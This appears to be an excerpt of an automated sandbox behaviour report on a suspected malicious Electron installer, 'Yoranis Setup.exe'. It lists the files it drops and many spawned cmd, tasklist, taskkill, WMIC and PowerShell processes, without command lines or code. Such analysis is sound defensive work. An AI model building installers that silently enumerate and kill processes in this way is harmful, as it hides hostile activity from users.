Source: C:\Users\user\Desktop\Yoranis Setup.exeFile created: C:\Users\user\AppData\Local\Temp\nsx353E.tmp\7z-out\dxcompiler.dllJump to dropped file
Source: C:\Users\user\Desktop\Yoranis Setup.exeFile created: C:\Users\user\AppData\Local\Temp\nsx353E.tmp\7z-out\d3dcompiler_47.dllJump to dropped file
Source: C:\Users\user\Desktop\Yoranis Setup.exeFile created: C:\Users\user\AppData\Local\Programs\unrealgame\libGLESv2.dllJump to dropped file
Source: C:\Users\user\Desktop\Yoranis Setup.exeFile created: C:\Users\user\AppData\Local\Temp\nsx353E.tmp\7z-out\libGLESv2.dllJump to dropped file
Source: C:\Users\user\Desktop\Yoranis Setup.exeFile created: C:\Users\user\AppData\Local\Temp\nsx353E.tmp\7z-out\resources\app.asar.unpacked\node_modules\win-version-info\prebuilds\win32-ia32\node.napi.nodeJump to dropped file
Source: C:\Users\user\Desktop\Yoranis Setup.exeFile created: C:\Users\user\AppData\Local\Temp\nsx353E.tmp\7z-out\resources\app.asar.unpacked\node_modules\win-version-info\prebuilds\win32-x64\node.napi.nodeJump to dropped file
Source: C:\Users\user\Desktop\Yoranis Setup.exeFile created: C:\Users\user\AppData\Local\Temp\nsx353E.tmp\nsis7z.dllJump to dropped file
Source: C:\Users\user\Desktop\Yoranis Setup.exeFile created: C:\Users\user\AppData\Local\Temp\nsx353E.tmp\7z-out\resources\app.asar.unpacked\node_modules\sqlite3\build\Release\node_sqlite3.nodeJump to dropped file
Source: C:\Users\user\Desktop\Yoranis Setup.exeFile created: C:\Users\user\AppData\Local\Programs\unrealgame\dxcompiler.dllJump to dropped file
Source: C:\Users\user\Desktop\Yoranis Setup.exeFile created: C:\Users\user\AppData\Local\Temp\nsx353E.tmp\7z-out\dxil.dllJump to dropped file
Source: C:\Users\user\Desktop\Yoranis Setup.exeFile created: C:\Users\user\AppData\Local\Programs\unrealgame\d3dcompiler_47.dllJump to dropped file
Source: C:\Users\user\Desktop\Yoranis Setup.exeFile created: C:\Users\user\AppData\Local\Programs\unrealgame\vulkan-1.dllJump to dropped file
Source: C:\Users\user\Desktop\Yoranis Setup.exeFile created: C:\Users\user\AppData\Local\Temp\nsx353E.tmp\7z-out\resources\app.asar.unpacked\node_modules\win-version-info\prebuilds\win32-ia32\node.napi.nodeJump to dropped file
Source: C:\Users\user\Desktop\Yoranis Setup.exeFile created: C:\Users\user\AppData\Local\Temp\nsx353E.tmp\7z-out\resources\app.asar.unpacked\node_modules\win-version-info\prebuilds\win32-x64\node.napi.nodeJump to dropped file
Source: C:\Users\user\Desktop\Yoranis Setup.exeFile created: C:\Users\user\AppData\Local\Temp\nsx353E.tmp\7z-out\resources\app.asar.unpacked\node_modules\registry-js\build\Release\registry.nodeJump to dropped file
Source: C:\Users\user\Desktop\Yoranis Setup.exeFile created: C:\Users\user\AppData\Local\Temp\nsx353E.tmp\7z-out\resources\app.asar.unpacked\node_modules\sqlite3\build\Release\node_sqlite3.nodeJump to dropped file
Source: C:\Users\user\Desktop\Yoranis Setup.exeFile created: C:\Users\user\AppData\Local\Temp\nsx353E.tmp\7z-out\LICENSE.electron.txtJump to behavior
Source: C:\Users\user\Desktop\Yoranis Setup.exeFile created: C:\Users\user\AppData\Local\Programs\unrealgame\LICENSE.electron.txtJump to behavior
Source: C:\Users\user\Desktop\Yoranis Setup.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\YoransSetup.lnkJump to behavior
Source: C:\Users\user\Desktop\Yoranis Setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Yoranis Setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Yoranis Setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Yoranis Setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Yoranis Setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\Yoranis Setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Programs\unrealgame\YoransSetup.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
